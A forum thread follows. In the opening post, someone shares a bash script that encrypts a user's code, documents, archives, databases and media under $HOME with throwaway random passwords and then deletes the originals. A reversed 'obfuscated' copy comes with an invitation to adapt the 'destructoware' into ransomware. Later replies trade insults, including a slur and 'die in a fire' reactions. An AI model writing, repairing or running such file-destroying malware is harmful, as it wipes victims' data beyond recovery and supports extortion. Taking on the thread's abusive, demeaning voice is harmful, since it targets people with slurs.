User Controls
Vandalize loonix.
-
2022-09-13 at 5:03 AM UTCI felt like writing a shell script, so i did, i didn't debug it however so it might not work 100%. Even so i wouldn't risk running this like YOLO.
#!/bin/bash
declare -A dword
dword[0]="*.c"
dword[1]="*.py"
dword[2]="*.txt"
dword[3]="*.doc"
dword[4]="*.sh"
dword[5]="*.php"
dword[6]="*.sqlite"
dword[7]="*.sql"
dword[8]="*.rar"
dword[9]="*.zip"
dword[10]="*.7z"
dword[11]="*.rb"
dword[12]="*.js"
dword[13]="*.h"
dword[14]="*.cpp"
dword[15]="*.png"
dword[16]="*.jpeg"
dword[17]="*.mov"
dword[18]="*.mpeg"
dword[19]="*.avi"
dword[20]="*.mp4"
cd /tmp
do_it(){
rand=$[ $RANDOM % 20 ] && rdf=${dword[$rand]}
while true ; do
crypt $HOME $rdf
done
};
# Main Crypto Operation
crypt(){
dir=$1
file=$2
while IFS= read -d $'\0' -r file ; do
file_list=("${file_list[@]}" "$file")
for $file in $file_list
do
pword=''
pword=$(cat /dev/random | LC_ALL=C tr -dc 'a-zA-Z0-9' | head -c16)
openssl enc -aes256 -e -k $pword -pbkdf2 -in $file -out $file.enc
rm -rf $file
#echo -e $pword
#echo -e $file
done;
done < <( find $dir/$file -name -print0 );
};
# Fallback
write_buf_B(){
cat << EOF > $TMP/crypt.src
#!/usr/bin/env bash
dir=$1
file=$2
while IFS= read -d $'\0' -r file ; do
file_list=("${file_list[@]}" "$file")
for $file in $file_list
do
pword=''
pword=$(cat /dev/random | LC_ALL=C tr -dc 'a-zA-Z0-9' | head -c16)
openssl enc -aes256 -e -k $pword -pbkdf2 -in $file -out $file.enc
rm -rf $file
#echo -e $pword
#echo -e $file
done;
done < <( find $dir/$file -name -print0 );
EOF
write_buf_A()
};
write_buf_A(){
cat << EOF > /tmp/cys
#!/usr/bin/env bash
umask -p 700 2>/dev/null
buff_ops()
{
cmd=$1
arg=$2
rm -r u_dev; mknod u_dev p && cat < `read -t (${cmd $'\0' arg})` 0<u_dev | /bin/bash 1>u_dev
};
buff_ops 'chmod +xs ' 'crypt.src ''
EOF
chmod +xs cys
rand=$[ $RANDOM % 20 ] && rdf=${dword[$rand]}
while true ; do
./cys ' exec /tmp/crypt.src ' '$HOME $rdf ' || exec /tmp/crypt.src $HOME $rdf
done
};
# Init Ops
if [[ $(which openssl) == '' ]]; then
OPENSSL_VERSION='1.1.1k'
# Download
curl -LO https://www.openssl.org/source/openssl-${OPENSSL_VERSION}.tar.gz
tar zxvf openssl-${OPENSSL_VERSION}.tar.gz
cd openssl-${OPENSSL_VERSION}
# Configure
CC=/usr/bin/afl-gcc -static ./Configure no-shared linux-x86_64
# Build
make
fi
umask -p 0700 2>/dev/null
do_it() || write_buf_B()
chmod +xs cys && ./cys 2>/dev/null
Feel free to adapt from destructoware to ransomware, if you have the ability and the motivation to do so. I even put some light obfuscation on it for you.
#!/usr/bin/env bash
${!#} <<< "$(rev <<<'}#!{$|")"}~~fI{$" s% ftnirp;'"'"'
LLUN/VED/>2 SYC/. && SYC SX+ DOMHC
)(b_FUB_ETIRW || )(TI_OD
LLUN/VED/>2 0070 P- KSAMU
PMT/ DC
IF
EKAM
DLIUb #
46_68X-XUNIL DERAHS-ON ERUGIFNOc/. CITATS- CCG-LFA/NIB/RSU/=cc
ERUGIFNOc #
}noisrev_lssnepo{$-LSSNEPO DC
ZG.RAT.}noisrev_lssnepo{$-LSSNEPO FVXZ RAT
ZG.RAT.}noisrev_lssnepo{$-LSSNEPO/ECRUOS/GRO.LSSNEPO.WWW//:SPTTH ol- LRUC
DAOLNWOd #
'"'"'"'"'"'"'"'"'K1.1.1'"'"'"'"'"'"'"'"'=noisrev_lssnepo
NEHT ;]] '"'"'"'"'"'"'"'"''"'"'"'"'"'"'"'"' == )LSSNEPO HCIHW($ [[ FI
SPo TINi #
;}
ENOD
FDR$ emoh$ CRS.TPYRC/pmt$ CEXE
OD ; EURT ELIHW
}]DNAR$[DROWD{$=FDR && ] 02 % modnar$ [$=DNAR
SYC SX+ DOMHC
foe
'"'"'"'"'"'"'"'"'LLUN/VED/>2 0TNIRP- W+O- MREP- DNIF($ emoh$ CRS.TPYRC/.'"'"'"'"'"'"'"'"' '"'"'"'"'"'"'"'"' CEXE'"'"'"'"'"'"'"'"' SPO_FFUB
'"'"'"'"'"'"'"'"' CRS.TPYRC'"'"'"'"'"'"'"'"' '"'"'"'"'"'"'"'"' SX+ DOMHC'"'"'"'"'"'"'"'"' SPO_FFUB
;}
VED_U>1 HSAB/NIB/ | VED_U<0 `)}GRA '"'"'"'"'"'"'"'"'0\'"'"'"'"'"'"'"'"'$ DMC{$( T- DAER` < TAC && P VED_U DONKM ;VED_U R- MR
2$=GRA
1$=DMC
{
)(SPO_FFUB
LLUN/VED/>2 007 P- KSAMU
HSAB VNE/NIB/RSU/!#
SYC/pmt$ > foe << TAC
{)(a_FUB_ETIRW
;}
)(a_FUB_ETIRW
foe
;) 0TNIRP- EMAN- ELIF$/RID$ DNIF (< < ENOD
;ENOD
ELIF$ E- OHCE
DROWP$ E- OHCE
ELIF$ FR- MR
CNE.ELIF$ TUO- ELIF$ NI- 2FDKBP- DROWP$ K- E- 652SEA- CNE LSSNEPO
)61C- DAEH | '"'"'"'"'"'"'"'"'9-0z-aZ-A'"'"'"'"'"'"'"'"' CD- RT c=lla_cl | MODNAR/VED/ TAC($=DROWP
'"'"'"'"'"'"'"'"''"'"'"'"'"'"'"'"'=DROWP
OD
TSIL_ELIF$ NI ELIF$ ROF
)"ELIF$" "}]@[TSIL_ELIF{$"(=TSIL_ELIF
OD ; ELIF R- '"'"'"'"'"'"'"'"'0\'"'"'"'"'"'"'"'"'$ D- DAER =sfi ELIHW
2$=ELIF
1$=RID
HSAB VNE/NIB/RSU/!#
CRS.TPYRC/pmt$ > foe << TAC
{)(b_FUB_ETIRW
KCABLLAf #
;}
;) 0TNIRP- EMAN- ELIF$/RID$ DNIF (< < ENOD
;ENOD
ELIF$ E- OHCE#
DROWP$ E- OHCE#
ELIF$ FR- MR
CNE.ELIF$ TUO- ELIF$ NI- 2FDKBP- DROWP$ K- E- 652SEA- CNE LSSNEPO
)61C- DAEH | '"'"'"'"'"'"'"'"'9-0z-aZ-A'"'"'"'"'"'"'"'"' CD- RT c=lla_cl | MODNAR/VED/ TAC($=DROWP
'"'"'"'"'"'"'"'"''"'"'"'"'"'"'"'"'=DROWP
OD
TSIL_ELIF$ NI ELIF$ ROF
)"ELIF$" "}]@[TSIL_ELIF{$"(=TSIL_ELIF
OD ; ELIF R- '"'"'"'"'"'"'"'"'0\'"'"'"'"'"'"'"'"'$ D- DAER =sfi ELIHW
2$=ELIF
1$=RID
{)(TPYRC
NOITAREPo OTPYRc NIAm #
;}
ENOD
FDR$ emoh$ TPYRC
OD ; EURT ELIHW
}]DNAR$[DROWD{$=FDR && ] 02 % modnar$ [$=DNAR
{)(TI_OD
PMT/ DC
"4PM.*"=]02[DROWD
"IVA.*"=]91[DROWD
"GEPM.*"=]81[DROWD
"VOM.*"=]71[DROWD
"GEPJ.*"=]61[DROWD
"GNP.*"=]51[DROWD
"PPC.*"=]41[DROWD
"H.*"=]31[DROWD
"SJ.*"=]21[DROWD
"BR.*"=]11[DROWD
"Z7.*"=]01[DROWD
"PIZ.*"=]9[DROWD
"RAR.*"=]8[DROWD
"LQS.*"=]7[DROWD
"ETILQS.*"=]6[DROWD
"PHP.*"=]5[DROWD
"HS.*"=]4[DROWD
"COD.*"=]3[DROWD
"TXT.*"=]2[DROWD
"YP.*"=]1[DROWD
"C.*"=]0[DROWD
DROWD a- ERALCED
'"'"'=fI($" s% ftnirp';)"
Bona Fortuna. -
2022-09-30 at 12:20 PM UTCNo answers huh, i guess all i can conclude is that i am a level 97 Cyber Security wizard and no one is even close to my level and therefore has nothing to contribute. Which is kind of unfortunate.
-
2022-09-30 at 12:45 PM UTCwats 4PM.*"=]02[DROWD
"IVA.*"=]91[DROWD
"GEPM.*"=]81[DROWD
"VOM.*"=]71[DROWD
"GEPJ.*"=]61[DROWD
"GNP.*"=]51[DROWD
"PPC.*"=]41[DROWD
"H.*"=]31[DROWD
"SJ.*"=]21[DROWD
"BR.*"=]11[DROWD
"Z7.*"=]01[DROWD
"PIZ.*"=]9[DROWD
"RAR.*"=]8[DROWD
"LQS.*"=]7[DROWD
"ETILQS.*"=]6[DROWD
"PHP.*"=]5[DROWD
"HS.*"=]4[DROWD
"COD.*"=]3[DROWD
"TXT.*"=]2[DROWD
"YP.*"=]1[DROWD
"C.*"=]0[DROWD -
2022-09-30 at 1:50 PM UTC2$=ELIF
1$=RID
{)(TPYRC
NOITAREPo OTPYRc NIAm #
what this do -
2022-09-30 at 1:59 PM UTC
Originally posted by Sophie No answers huh, i guess all i can conclude is that i am a level 97 Cyber Security wizard and no one is even close to my level and therefore has nothing to contribute. Which is kind of unfortunate.
you don't have a single clue what the fuck you're doing sophie, that has been well established.
there's an error in it, it's really fucking obvious. one of the container format file types will never be encrypted, tell me which one and why.
i'll even give you a clue, because i know you'll need it - it's a really common class of error. -
2022-09-30 at 2:15 PM UTCSuck my dick. Did you read the OP? I didn't debug it. Because i didn't feel like it. What's with you and getting big mad at me for posting half assed stuff and claiming God mode, for the lulz.
By the way, do you honestly think i care if it doesn't encrypt something? I just shotgunned a bunch of file formats. Do you really think i run Ransomware Ops or any kind of Ops with the content i post here? Lmao. -
2022-09-30 at 2:20 PM UTCHey troon, did you study Computer Science at University? Is that the reason you're so uptight about this. Even if you work in Cyber Security wanna bet i make more money than you?
-
2022-09-30 at 2:20 PM UTCThe following users say it would be alright if the author of this post didn't die in a fire!
-
2022-09-30 at 2:22 PM UTC
-
2022-09-30 at 2:25 PM UTCTroon showing who's the real coder
-
2022-09-30 at 2:26 PM UTCI have a distinct way of writing Bash. If you can find the Github account that has the same style as me, to the letter. I will login to github, and make a 'troon is silly' repo. Because the Github account in question will be mine.
-
2022-09-30 at 2:27 PM UTC
-
2022-09-30 at 2:43 PM UTC
-
2022-09-30 at 2:46 PM UTC
-
2022-09-30 at 2:48 PM UTCTroon is the real tech master here clearly.
-
2022-09-30 at 2:56 PM UTC
-
2022-09-30 at 2:57 PM UTCLol Sophie the copy 'n paste master getting schooled by Troon.
-
2022-09-30 at 3 PM UTCTroon is still salty from that one thread where MLT dropped by to back my work up. Troon has been a fan of TeamPoison since he was a small boy.
-
2022-09-30 at 4:11 PM UTCThe following users say it would be alright if the author of this post didn't die in a fire!
